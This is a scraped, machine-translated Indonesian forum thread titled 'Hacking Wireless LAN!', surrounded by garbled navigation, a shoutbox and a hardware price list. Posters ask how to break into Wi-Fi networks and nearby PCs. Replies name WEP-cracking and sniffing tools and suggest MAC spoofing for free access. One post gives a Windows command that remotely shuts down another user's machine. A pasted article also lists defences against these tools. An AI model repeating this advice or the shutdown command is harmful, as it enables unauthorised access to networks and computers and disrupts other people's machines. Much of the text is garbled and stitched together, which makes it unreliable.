Oh well .. it .. I'm waiting ... 7th edition of the publication date when?
Logged
-------------------------------------------------- ------------------------------
Venice 3000 + @ 2600 (daily) .. so far
DFI LP UT Nf4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa GeForce 6600 GT
Samsung SATA 80
EXtreme 500
inou
Nubi all the time ... : D
[Community Member]
Trade Count: (2)
[EXTREME]
Posting Quality: 1
Offline
View Inventory
Send Money to inou
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
!!
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania
Rusia
Serb
Sloven
Slowakia
Spanyol
Suomi
Swahili
Swensk Thai
Turki
Ukraina
Vietnam
Wales
Yiddi
Yunani
Penerjemahan
Penelusuran Diterjemahkan
Translator Toolkit
Home Forum
Help Arcade
Calendar Shop LIVE
CHAT GoogleTagged
Login Register
Home
button Forum
Help Arcade
Calendar
Masukan Shop
Untuk LIVE
CHAT GoogleTagged
Pejabat-pejabat
Login Register
Forum HYPERMEDIA
button
You are not allowed
to view links.
Masukanor
Register Untuk
Login
Pejabat-pejabat
click here and post
Forum HYPERMEDIA
You are not allowed
to view links.
Register or Login
The Unordinary
click hereistilah
Masukkan and post
Terjemahkan dari: Bahasa Indonesia
pencarian Anda
Web hyem.org Terjemahkan
Terjemahkan ke: Inggris
Kirim formulir
The Unordinary
pencarian
Terjemahan
Masukkan Bahasa
istilahIndonesia ke Inggris Tunjukkan huruf latin
pencarian
You are not Anda
allowed
Web
to viewhyem.org
images.
Kirim
Pleaseformulir
register or
pencarian
login
You are not allowed
to view images.
Please
Welcome,register
Guest. or
login
Please login or
register.
March 06, 2010,
05:55:13 AM
Welcome,
1 HourGuest.
1 Day 1
Please
Week 1 login
Month or
Forever
register.
Login with username,
March 06,and
password 2010,
session
05:55:13
length AM
1 Hour 1
Pricelist Day 1!!
Update
Week 1 Month
PRICELIST Forever
UPDATE =>
Login
You arewith
notusername,
allowed
password and session
to view links.
length
Register or Login
Pricelist
(last updateUpdate
2009!!
PRICELIST
Okt 21) UPDATE =>
You are not allowed
to view links.
Register or Login
HYPER Xitro
(last update
Dragon-3D 2009AP1
Design
Okt 21)II X4 From X2
Phenom
Deneb, DFI LP DK
790FXB-M2RS,Palit HD
HYPER
4850, Xitro
OCZ Gold
Dragon-3D
Edition 2 Design
x 1GB, AP1
WDC
Phenom
500 GB II
16 X4
MB,From
ATX X2
+
Deneb,
EnhanceDFI
400WLPTrue
DK
Home Forum Help Arcade Calendar Shop LIVE CHAT button GoogleTagged Login Register
The Unordinary
Enter your search terms
Web hyem.org
Submit search form
| LCD 15.6 "+ Key + Mouse = Rp. 950rb | LCD 19" + Key + Laser Mouse = Rp.1.300rb | LCD 16
"+ Key + Mouse = Rp. 990rb |
Palit HD4870
Palit HD4870 Sonic Dual Edition DDR5, 512MB, 256bit OC 775/4000 Dual Speed (in some cases
is still 256bit graphics lbh dr 5770 128bit superior, let alone reply we see from the price /
performancenya)
PROMO: $ 150
Palit HD4850
Palit HD4830 DDR3, 512MB, 256bit, Core: 575 / Mem: 1800Mhz + HDMI
Youngest brother of the family RV770, Still be the Price / Performance King!
PROMO: $ 90
With DDR3, High-end card is legendary high-end display card under $ 100, especially for high-
OC .. This babe is the Most Value King!
PROMO: $ 78, 512M: $ 65
ALL AVAILAVBE
Chat Now!
[more]
Last 20 Shouts:
-------------------------------------------------- ------------------------------
Panji
Today at 01:44:28 AM
Good for Hendy hyem .. lu ganyangka win bro ..
an35
Today at 12:50:18 AM
let kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
quiet mas dab ...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do that 'an: p
B.U.G.S
Yesterday at 05:05:04 PM
@ Tito Haga
nge's iso-move nggo redirection tp ga, ga dadi metu MOVED .. MOVED .. MOMED marai ngunu
wae .. wakakaka ..
coolwin
Yesterday at 04:58:26 PM
BEST UPDATE CHECK today CF KILL !!!!! I'M IN RANK 2 wakakakakaka
Tito Haga
Yesterday at 02:51:11 PM
@ BUGS
hahahaha ... .. bar Tangi sori2 turu ngono kui ngemoved yes ... haha
donkey
Yesterday at 01:57:41 PM
wakakakaka ....
blackshield ™
Yesterday at 11:54:06 PM
cilukkkkkkkk
baaaaaaa ...
B.U.G.S
Yesterday at 10:39:35 PM
Jove, moved ming kok isine kabeh kie ..? nek nge-mending move topic lawas not dikei redirection
ga kang ..
Tito Haga
Yesterday at 08:26:27 PM
wakakakakka ... means the same boat
sadnux
Yesterday at 08:20:42 PM
its not about bersih2, tp itu lho yg in sign writing about college yg
parent often say kek gitu pas kl ane marahin T_T
Tito Haga
Yesterday at 08:13:04 PM
Hahahahaha ... yes ... maap2 technical error had bersih2 le ngemovednya wrong ... so kamr jugah::
sadnux
Yesterday at 08:09:47 PM
beautiful morning .. tp yg ketendang same directly pack signaturenya ditto
wakakakak
Tito Haga
Yesterday at 07:56:09 PM
morning kang
sadnux
Yesterday at 07:47:53 PM
met pagi all
Tito Haga
Yesterday at 06:34:29 PM
weh ... kang banner onlen
Panji
Yesterday at 06:13:51 PM
miss u all ...
Tito Haga
Yesterday at 05:30:56 PM
Ndalu gang
Polling
Lates Post
Sell fingerboard where y. .. by vheebhee [Today at 03:46:23 AM]
Tanya Mo. .. More Niy Can ... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
EXPLANATION PLEASE wearing ... by botaxalim [Today at 01:54:06 AM]
Update March 5, 2010 Cross ... by botaxalim [Today at 01:36:16 AM]
[ASK] Building Network by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot ... by Hazzan [Today at 12:24:06 AM]
guitar hero pc pake maen ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Works 3D Made An ... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie Unru ... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] 915GAV Intel 3x Tit ... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 PM]
Adjust DDR3 you ...!!! by masYogo [Yesterday at 05:18:00 PM]
[review] HaPe Modem "ray ... by frozr_man [Yesterday at 05:08:18 PM]
AMD VS INTEL <FIGHT! > By didit_catro '[Yesterday at 04:15:54 PM]
[Ask About] proci Warranty ... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] How to mbungkam Fan B. .. by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Creativity Adu Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10,884
Latest: Ricko
Stats
Total Posts: 102,876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP
berang_berang
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to berang_berang
Topic starter
-------------------------------------------------- ------------------------------
Kalo we want to hack the standard w.LAN tools2 what we wrote butuhin, and how gmana?
Logged
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 1 on: March 13, 2006, 01:02:12 PM»
-------------------------------------------------- ------------------------------
kismet for netstumbler & nyari AP or SSID yg buat airsnort active & ngecrack password ...
manual installation & tutorial googling aja. Jgn lupa kalo successful password share ...........
Logged
-------------------------------------------------- ------------------------------
Logged
RooTrick
[Community Member]
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to RooTrick
-------------------------------------------------- ------------------------------
download dmn tuh om?
trus kalo uda dapet makes source code applications na na gmn?
thx bgt ...
: mrgreen:
Logged
-------------------------------------------------- ------------------------------
Let the world revolves around me ...
densinyo
[Community Member]
Trade Count: (0)
[Enthusiast]
Posting Quality: 0
Offline
View Inventory
Send Money to densinyo
-------------------------------------------------- ------------------------------
DL dmn tuh ... boleh dong requested the link ...
Logged
-------------------------------------------------- ------------------------------
T-Force 550! Athlon64 X2 4000 +! Adata 2gb! AcBel 400w! WDC 500GB! Pioneer DVD RW!
Lite-On DVD! A4Tech
-=- environment ranging from self-=-
081-5612-7812
-------------------------------------------------- ------------------------------
Logged
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 4 on: March 21, 2006, 03:09:47 PM»
-------------------------------------------------- ------------------------------
I have lg nih project, make antenna can make WiFinya YKPN shoot, there have any experience yg
ga tin bkin antenna?
Search tool material n ada yg tau ga?
This tutorial is reply pd sdikit interest:
You are not allowed to view links.
Register or Login
Logged
MAS
[OprekPC]
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to MAS
-------------------------------------------------- ------------------------------
This follow aja deh ... You are not allowed to view links.
Register or Login sdh was too old Linux (Auditor following sdh n dah find her hard to replace
Backtrack) tp sure deh, klo you are able to implement, easy wuiiih banged.
one more thing .... wifi chipset election jg jd diliat pertimbangan.bisa here
klo for windows, in addition netstumbler pake aja WDRIVER and AirSnort.jamin isa (klo cuman
make WEP) tp klo dah target MAC auth make it give up deh mas ... hehehe, before there isa yg
Logged
-------------------------------------------------- ------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Mods - Tweak - Overclock PC
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
gini bro, I'm on campus pake pake internet.tp facility via pc connected via LAN. trus time ta 'clay
found in the network is also connected via laptop2 wifi. I liatnya pake cmd, trus ta 'type "net view"
out tu laptop2nya. can ta 'not hacked from the pc I pake?
thanks ya ... (just curious, do not want to harm everybody)
Logged
psyCHo_L061c
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to psyCHo_L061c
-------------------------------------------------- ------------------------------
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie
Logged
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
Re: Hacking Wireless LAN!
«Reply # 8 on: January 26, 2007, 08:04:29 PM»
-------------------------------------------------- ------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie
Logged
-------------------------------------------------- ------------------------------
Order: hyem_toko
Logged
silverx
Trade Count: (0)
[Enthusiast]
Posting Quality: 1
Offline
View Inventory
Send Money to silverx
-------------------------------------------------- ------------------------------
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
network, although worgroupnya different ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1
Logged
-------------------------------------------------- ------------------------------
"Have Something In Need, Not according Desire "....
Arwan
Trade Count: (0)
Interest ..
Posting Quality: -1
Offline
View Inventory
Send Money to Arwan
-------------------------------------------------- ------------------------------
Netstumbler, Kismet, and Aeroneet / aeropeek
aeropeek can open either AP WEP WPA reply ... (not nyoba)
ASCII is usually encrypted so we look for similarities alone ... and may be divided into 4 atao like
ASCII codenya'll see ...
This can also be used for the man in the middle attack
There is no reply aeropeek MBO software I shared ... my software got damaged jeefo, and it is the
master .... kalo download more males (trial)
cmiiw
Logged
-------------------------------------------------- ------------------------------
i have my own journey
lelahana
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to lelahana
-------------------------------------------------- ------------------------------
sadisssssss ....
wah .... kckckckckckc linings semuanyajago ..
but the reply requested diajarin way, there are going ga?
jadi pengen nih ... curious buanget ga tau .... but how ...
ajarin dunks .. : '(:' (: '(:' (: '(:' (
Logged
arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]
Quality posts: 2
Offline
View Inventory
Send Money to arbangun
ARB'S Coorp
Re: Hacking Wireless LAN!
«Reply # 12 on: April 13, 2007, 12:52:50 PM»
-------------------------------------------------- ------------------------------
NUAMBAAAHHIIINN ... waaakaaakaa .....
tu pake tool, klo ga slh we can pass ama dpet username for log-on.
hmmm ya no more for a computer intruder detection can try jg nih pake this way
Quote
== MENDITEKSI NETWORK THROUGH intruder DOS ==
BEGIN
It turned out there at Dos facility that may we all forgotten and rarely used
command is NETSTAT. Windows provides this command to support
network. Netstat can also be used to see the ip-ip that are connected
into our computer.
For that open the dos command you, you know how: d if ga tau nich:
- Start> Run> command.exe [for Win 95/98]
- Start> Run> cmd.exe [for a win 2000/XP / nt]
then the command prompt appear deh
C: \ WINNT> netstat?
Displays protocol statistics and current TCP / IP network connections.
Now we use netstat to see the connections that are connected using-a
C: \ WINNT> netstat-a
Proto Local Address Foreign Address State
TCP me: http me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: epmap me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: https me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: microsoft-ds me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1025 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1027 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1028 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1071 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1146 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1163 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1253 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1261 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1288 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1306 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1314 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 5101 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: epmap 10.22.1.236:4504 TIME_WAIT
TCP me: netbios-ssn me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1071 LAJKTTS02: 1080 ESTABLISHED
TCP me: 1288 IS ~ HRS: microsoft-ds ESTABLISHED
TCP me: 1306 GREENGUY: microsoft-ds ESTABLISHED
UDP to: 1134 *.*
Quote
taw for the host name of the destination computer .. pake scans can also be angry.
deh after that type in the command prompt eg:
c: / shutdown-s-f-m \ \ abcd-t 20
tu gone in 20 seconds, the client computer will shutdown .. violence ... : '(
-------------------------------------------------- ------------------------------
E2140 @ 3.2 Ghz | Mobo Biostar 945G Micro 775SE Ext | A-Data 2x1GB 800 PC6400 | LiteOn
DVD-RW | HIS X700Pro IceQ 256/128MB PCIe | LG LCD monitors 21 "
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login
Arwan
Trade Count: (0)
Interest ..
Posting Quality: -1
Offline
View Inventory
Send Money to Arwan
-------------------------------------------------- ------------------------------
lho kalo mas remote computer system of his victim's ga ga diaktifin can shutdown the victim with
the command C: \ shutdown .... cmiiw
yup, ethereal function read (read: capture) a message or data that flows on the network, so the
current data flow can be seen, what is opened, what data is sent if the email, myspace or something,
but can not seem to pass data https or secure socket layer, fix if I'm wrong
arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]
Quality posts: 2
Offline
View Inventory
Send Money to arbangun
ARB'S Coorp
-------------------------------------------------- ------------------------------
More from yesterday ..... ADDITIONAL PAKE PInter BIAR BHS. ENGGRIS YES ...
Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:
Network stumbler aka NetStumbler - This Windows based tool easily finds wireless signals being
broadcast within range - A must have. It also has ability to determine Signal / Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
Kismet [url] http://www.kismetwireless.net/Kismet
[/ url] - One of the key functional elements missing from NetStumbler is the ability to display
Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you
should Realize that Access Points are routinely broadcasting this info; it just is not being read /
deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical
in finding wireless networks.
Once you've found a wireless network, the next step is to try to connect to it. If the network is not
using any type of authentication or encryption security, you can simply connect to the SSID. If the
SSID is not being broadcast, you can create a profile with the name of the SSID that is not being
broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network
is using authentication and / or encryption, you may need one of the following tools.
Airsnort - This is a very easy to use tool that can be used to Sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you'll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.
Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.
Ethereal - While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to Sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to Sniff-out non-broadcast SSIDs.
The aforementioned utilities, or similar ones, will be Necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.
Just as it's important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.
NetStumbler - Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.
Kismet - There's really nothing you can do to stop Kismet from finding your WLAN, so Ensure
your WLAN is protected by using advanced Authentication and Encryption
Airsnort - Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).
Cowpatty - Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of Residing in a dictionary file that would used to be try and guess your key and / or would
take longer. If in a corporate scenario, do not use WPA with Pre-Shared Key, use a good EAP type
to protect the authentication and limit the amount of incorrect guesses that would take place before
the account is locked-out. If using certificate-like functionality, it could also validate the remote
system trying to gain access to the WLAN and not allow a rogue system access.
ASLeap - Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.
Ethereal - Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
Logged
Jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 15 on: April 16, 2007, 10:42:34 PM»
-------------------------------------------------- ------------------------------
Ato okay how fuzzing
This reply is more relaxed, more 'polite' ..
Yg cmn clearly not useful for WLAN doang ..
Logged
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
kalo the MAC address, instead of a software tuh make change MAC address?
anyone ever tried blom? a good tu be replaced kalo, can be many hours free access .... hehee
Quote from: silverx on March 17, 2007, 11:41:56 PM
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
networks, although different worgroupnya ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1
kalo ndak wrong, I had also been mbaca similar articles. yes the cord tied to a WLAN antenna. gak
tau deh, kalo gak pake WLAN antenna can be anything ndak.jadi not pake usb, serial.kalo ndak a
diameter of the can also be adjusted to?
Logged
Panji
[Here To Help]
[Super Admin]
Trade Count: (2)
[Hyper]
Posting Quality: 72
Offline
View Inventory
Send Money to Panji
-------------------------------------------------- ------------------------------
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!
Logged
-------------------------------------------------- ------------------------------
just trying to serve You ...
You are not allowed to view images.
Please register or login
work as hard as u can .. and .. be as simple as u can, to be part of Others!
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 18 on: April 19, 2007, 03:19:49 PM»
-------------------------------------------------- ------------------------------
Crack WEP can be read at the 2nd edition HyperMedia Magazine.
Logged
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
bro all, mo nanya nih, kalo through Cain and abel dah dapet ip address, port, ama SSID, trus gimana
biar bisa nge-purpose remote computer?
Logged
aghya
[Community Member]
Trade Count: (0)
[Enthusiast]
Posting Quality: 0
Offline
View Inventory
Send Money to aghya
-------------------------------------------------- ------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!
Oh well .. it .. I'm waiting ... 7th edition of the publication date when?
Logged
-------------------------------------------------- ------------------------------
Venice 3000 + @ 2600 (daily) .. so far
DFI LP UT Nf4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa GeForce 6600 GT
Samsung SATA 80
EXtreme 500
inou
Nubi all the time ... : D
[Community Member]
Trade Count: (2)
[EXTREME]
Posting Quality: 1
Offline
View Inventory
Send Money to inou
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
!!
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
Sumbangkan terjemahan yang lebih baik
username, password
and session length
<br>Pricelist
Update!!
Object 3